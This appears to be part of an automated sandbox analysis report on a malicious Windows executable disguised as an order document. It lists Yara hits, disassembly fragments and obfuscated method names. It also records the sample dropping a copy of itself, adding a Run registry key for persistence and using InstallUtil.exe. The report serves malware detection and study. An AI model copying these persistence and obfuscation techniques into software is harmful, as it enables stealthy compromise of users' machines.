                    Source: Yara matchFile source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7EE89 push es; retf 0_2_06D7EEAC
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7EE75 push es; ret 0_2_06D7EE88
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7BBB6 push ebx; retn 0019h0_2_06D7BBBA
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7CB18 push es; retf 0_2_06D7CB29
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D7D8E1 push B9FFFFFFh; iretd 0_2_06D7D8FF
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D9803F push es; retf 0_2_06D98040
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D95F8F pushad ; iretd 0_2_06D95F99
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06D97C7C push cs; ret 0_2_06D97C7F
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE7486 push es; iretd 0_2_06EE7488
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EEB275 push ebx; ret 0_2_06EEB277
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EEB350 push es; retf 0_2_06EEB354
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EEB0F5 push ebp; ret 0_2_06EEB0F6
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE1845 push es; retf 0_2_06EE1858
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE696A pushfd ; ret 0_2_06EE696B
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06EE6927 pushfd ; ret 0_2_06EE6933
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1B7D0 push es; ret 0_2_06F1B880
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F135F4 push ebx; retf 0_2_06F135F7
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1B890 push es; ret 0_2_06F1B880
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1606D push es; ret 0_2_06F1609C
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F1783E push es; ret 0_2_06F17840
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F42C3F push eax; retf 0_2_06F42C4D
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F53EBF push ds; ret 0_2_06F53EC4
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_06F5368C push ecx; retf 0_2_06F53691
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_071D694F push es; retf 0_2_071D6957
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeCode function: 0_2_071D3DB5 push ebp; ret 0_2_071D3DBB
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06132EA7 push esp; retf 3_2_06132EA8
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619EE89 push es; retf 3_2_0619EEAC
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619CB18 push es; retf 3_2_0619CB29
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619BBB6 push ebx; retn 0019h3_2_0619BBBA
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_06192830 push es; ret 3_2_06192840
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeCode function: 3_2_0619D8D7 push B9FFFFFFh; iretd 3_2_0619D8FF
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, yEYn7memXanvY8qAQSm.csHigh entropy of concatenated method names: 'FEDeD8JObi', 'n3leq05POl', 'phqdjSW1EHagOG4i8qw', 'y6n0PSW2AhrKyiQa8yc', 'qh1booW5C5qxwrENGSR', 'OtNit5Wuu0MA0pnE6rU', 'd9kCsoWPeBjm1nwoqXB', 'GDHgFfWxdcUjO4DrcSd', 'qsmFqSW9wK7rvhF7uox', 'FyRnAvWaTq7YfILBNpC'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, TtfWM0eceGs3PlVqVWr.csHigh entropy of concatenated method names: 'VqyeynjM76', 'cECeiUMjMx', 'lXyeBPMoIM', 'hAcmnBWRIrofFEHvmqd', 'INMjjUW6T26HvMtNapD', 'Cr5KfkWUvWqL55cCk54', 'UHp6UyWwaaEw7smLIOT', 'AQ9w5FW8rjVy30sFFjv', 'HasmPyWbAcscSZl3meB'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, OdXLaBw9iYOibl1f1M.csHigh entropy of concatenated method names: 'rb668LkOc', 'LxT8FLiuk', 'SHRgUJVgH', 'TrjbgmRMs', 'qIVJC8gEmv8KbfeXdCs', 'JhUPCigcw9kDl4yiblZ', 'sTeX06gNyffLFFjF48x', 'Sotcv2gyndCvlsVseVQ', 'ICbedkgi4bLd1DPPSif', 'YsqipEgXUTxfVa9HZyU'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'xAeipOJKHKFbfhP6Vuq'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, skVet7A78GyY9gLd8ZD.csHigh entropy of concatenated method names: 'bheATP1iuO', 'HSd1AlTc7Ku1xnAspAc', 'pLhS4KTNycaKqJowIGm', 'yh3tElTy1dsy2qg3WKp', 'TXgTT4TibOo8YM1DlVK', 'wga0uITXHM0C2FudsXm', 'HlfYZDTBIheJlkgOam4', 'e1KgcYTQsRR3GlARb55', 'DSZ6KyTEs0bQC5fFGt9'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, IKNxv70zBKwI7SQQVOR.csHigh entropy of concatenated method names: 'T82L6WF7TG', 't99L8KKxhI', 'brgLbci04O', 'JxeLgEt52m', 'mSOLkIsghU', 'DJcLOH7dcw', 'lNYL7s8gss', 'o67ZRo1gBU', 'KAsLvb7hAn', 'QL4LTyLiPX'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, oidSR1eRJxx5CN4TlPx.csHigh entropy of concatenated method names: 'LEie8jRUaa', 'GVHeb8Vene', 'vYskn3J485MHJeTtane', 'PormX0JYrX7LferYs5K', 'XlHkhsJ0n45UP1uSsOY', 'AnJ9j2JZKOZv3VNSAcW', 'Sme1kGJrt1J6eXhT9WX', 'eLUnqYJpsEH5doaTgeo', 'P1kfDpJmEMPyLA2XwkD', 'Afg5abJLWOms20JAdXS'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, GRlSkweTHMcoyE79RKn.csHigh entropy of concatenated method names: 'AJqPJRpmw7', 'ERAfA4SZbH5ety5LEvo', 'Add6F9S467GwAnkODAl', 'NdrZT4SYHye2WOsj8gY', 'qQopZNSrNZXMgXVtFji', 'UBZmq7SpQ04tmdLD18p', 'jdPfILSde4I1guIO1uJ', 'GXpblJS0cIOAT0B8Y8y', 'kLtkvqSm5O2fN1gFUex', 'bBTtnVSLFJipJVfFPO8'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, uIiY3gi8rETsT9Cm4WP.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'JarigQqLwn', 'NtProtectVirtualMemory', 'cDWcjs7tIE1NJX8AE4q', 'ARbs8N7KUR7GPNqU7hN', 'wtOeZk7sy4jC09TuyRP', 'gZl5Ay73iFAyZHMUPKT'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, UslcZ6E6BIU3iypoirI.csHigh entropy of concatenated method names: 'xZWEb231kw', 'eZ6Onqgj9dCVPNTve0p', 'C7p1y8gsqjrR6hhO13f', 'zNBFEPg3Po5IbP9beqO', 'qRNjy6gtgYEcMRPEGSs', 'JsbNOxgKUbB4iqdxy8l', 'u9VIw3guRfQC1mNYyr6', 'kSn4BXgPdCMslCYi7PN', 'VdAWFVg1u9JV0yIrRA4', 'Lk2XDhg2CSUlXXXayFN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, wEKG5YAW68OG7npcPmT.csHigh entropy of concatenated method names: 'DVXASMkmVe', 'fqQAjm6ybv', 'YZFb14TeY0CsZxw2T66', 'Vbx4olTd7YhjUWe6b5p', 'INW909T0B0yoC34VetI', 'FS9VQyTZIetuPIFdSlx', 'ErwbvsT4YBNZXFHKtLd', 'T3f22GTYkZQ5NB8uwFw', 'd5b9wSTrsT3qMp961J7', 'NlcTmvTpvrCTccx3OxE'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, b4GjdDeeR7yamg5YNco.csHigh entropy of concatenated method names: 'GQee0wqPXX', 'D4mNvoW7JVYseCmy2YF', 'TGciOqWvimHtkuNNdg8', 'l3vki5WTXcaWv2ZcHnI', 'fLKotMWWkX6JhVDZomJ', 'lCJ7NdWJO5RusXLhb9p', 'wpp3ZyWkCtwHghLpNEp', 'yF0UjYWO96vtgLb6X0M'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, kjbh9IiAKlsbusEoE34.csHigh entropy of concatenated method names: 'tDTidc0ska', 'SqPiZf6arr', 'RuGiYmeFCt', 'VmmipdQboo', 'SYTimT8y0J', 'yJ2iLwmVua', 'lwMiDdWerh', 'vyiiqWEg37', 'LCainIIxGI', 'NvZiU1R6Ui'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, EPkwiQyTwjV6nIifFoD.csHigh entropy of concatenated method names: 'TlgyJ6IMCE', 'XP4yScfsKW', 'TTEyjKhb7C', 'R9fyskE2ia', 'gJhy3c9e6Z', 'MoFmQkkzJjrtDCev5P3', 'ORHtsoOV9Lx3f1O46tD', 'XLLBd3OQVJ2vCdIfEoH', 'zeIDdeOECj1nfl2Drk7', 'LY47NeOcFPQX2oxUt9w'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, LDnbW8ytP2Wa2WMltog.csHigh entropy of concatenated method names: 'Y6UyumOPER', 'z3yyPjkaCf', 'CpRy1PKnoj', 'lo3bhYOKB8ryHv13tk9', 'dM4s1TOud3Bctn06dR6', 'O9ZkmHOPSb2IODJ7WwA', 'zGXkbMO3b1arKWNZ2Tn', 'BCpjuuOtZjeo56NQw3U', 'Ve9UTPO13GaefNaQk1E', 'KiOcYQO20KJnhtsbHoO'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, L4RVaiZVwXOc4HE7Js.csHigh entropy of concatenated method names: 'xSQrwywWW', 'T2ppeI8NJ', 'PwPLtm2ns', 'qIDDAvUPq', 'ruXY4PZ6D', 'WaYSDIbfSRsTrdTpfi9', 'lYaV13bl7d3sVlJ3Ab2', 'hidmrDbGKRimlmeDgZv', 'uTfTWObMTnPi97rYRw0', 'iArcPkboFp4aRfElYS8'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, dIMcEbAfTlk1Wdn2deZ.csHigh entropy of concatenated method names: 'KFxAGwLRLi', 'Asxq68WdKwQ2hehDYQw', 'XqB1FQW0ck2cqVxXYyX', 'qYR2ZvWZ4JQl7CgEY13', 'MUk64DW4cuhI0BcKXyP', 'R7jViOWY7NHUQkLp1vd', 'TdtYWcWrwXFy79nD13A', 'DoQ0ybWpVIcRlt2lJcd', 'RDwjjqWAMQ0pNDXUDJw', 'd8OgiRWesPPQR01Aqr9'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, fARbumiWEDLJYiPIk0q.csHigh entropy of concatenated method names: 'u4TiKRkpmd', 'Po74g17GFsG3YWOMX0G', 'i5Y9u87MCS8ps8F4NAh', 'pgEKqK7oUbQ9jxjQZrV', 'On2Hna7fdM6hidPNMDj', 'IVWn0f7lHZM5UfrdTBe', 'e2cI8l7aWqu0gWRMXkq', 'eSMpwP7HQkkg1mim4wN'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, Qk7gYy0sSX4FPdJgcVY.csHigh entropy of concatenated method names: 'ivP0HwuyH4', 'haX0FF1CF1', 'f2N0CoECNk', 'mRR0IcX4X0', 'Sy60hDCi8C', 'vTx0fL0cSK', 'R7d0lSslYs', 'N7s0GASlS6', 'H9X0MTg5kx', 'G740oN4elt'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, AFwsjUAacvViAPVZUCk.csHigh entropy of concatenated method names: 'nYQAFfrOh8', 'lo8kvdTf0GlGL3McVuA', 'UgSlnQTl0rVHNqoqgZw', 'IA5mhkTGYrPuRLwiP6L', 'WmFv54TMSIUnAVJuisx', 'hnHRs2TotU891deLlC3', 'YiDlyJTzBWh7CEKyWPy', 'g9eVVFWVG6JQGggn9YK', 'FOEBCNWQsNRaQbZ6XUl', 'wknU0tWEOXw0Q0ce3vx'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, EMIdZ6y8LHgGiSTYM1N.csHigh entropy of concatenated method names: 'k11yg8aYZn', 'rKWykGlPcL', 'NGDmMYk1K1B8LU5aQTS', 'dbewhBkuEvt2t8QpK1t', 'xdke4vkPEnsB6l11nGD', 'W69LZ2k2gd9AaGVhN7J', 'VtRs1Tk5I8ZB4gJOhiS', 'N7R1ZUkxDB103dqbxGH', 'HAofQ1k9CKgmOZJQZPx'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, CPvVT7enGUahd3DvErc.csHigh entropy of concatenated method names: 'ruuewO24wx', 'ypnN8TJNlgolNNgC7IA', 'jMnVk6JyIbKfy8qg6ML', 'LL7XaaJilkJtB896Uu2', 'FR5MnSJX6wBKmGHxGVQ', 'QA9kBUJBhSTgRE9jUg8', 'Lv46QsJAJmyeAZHDMp5', 'c2U3Q9JekVIHCrpSEyA', 'IhOxJYJEiLthP1LAl6Y', 'Lb0OPuJc31kEMK8lW2O'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, RoVkKwyOfIfhUajKqRO.csHigh entropy of concatenated method names: 'auJyvpPPMI', 't7ev2pkCl46PKiZjanR', 'uHuEBckI81NjjGAKHSq', 'EPGsPskhZ8cHANQFEuR', 'paAgCykf15x64TVokxj', 'KdRiNIklwqNJTlrpXXf', 'OfkAvCkHZEjIc6SMxgL', 'plVqJ2kF10roLpuZ7H1'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, zD4eAqejnbD8YI9R4OZ.csHigh entropy of concatenated method names: 'UxcZrGSRd1jV3Km1x9P', 'HmGUYbS6vfC7rG4e23L', 'nWk00nJpyn', 'GhcDhSSkgI46lf7565G', 'lnplprSOKNJqxTjI7x0', 'xiRogHS7UdUtaWeyM3Y', 'TEKnC5SvIJ1GyULgbFc', 'JyJHOKSTau6Z44eOwU7', 'SJuHBUSWwaxm7dcSEXh', 'EjhLvBSJC8vVOSYjZ0I'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, IXOA88AKGdrSMEyBYTO.csHigh entropy of concatenated method names: 'va5A2BCAdH', 'KOxA5hWqpU', 'oJAAPA7k68', 'Up1A11ZMm0', 'I6xHWxT21ZJlbL97qgD', 'ulVYIpT5nUm83I4J9pq', 'xjDYNITxMXdtaOpbSoA', 'rSoC1LT9oi3jbK5CaDR', 'ep2SAGTaXPmLlIpU8jX', 'WPbemGTHXaMSMTyK9o4'
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeJump to dropped file
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CbgoomiexwJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CbgoomiexwJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
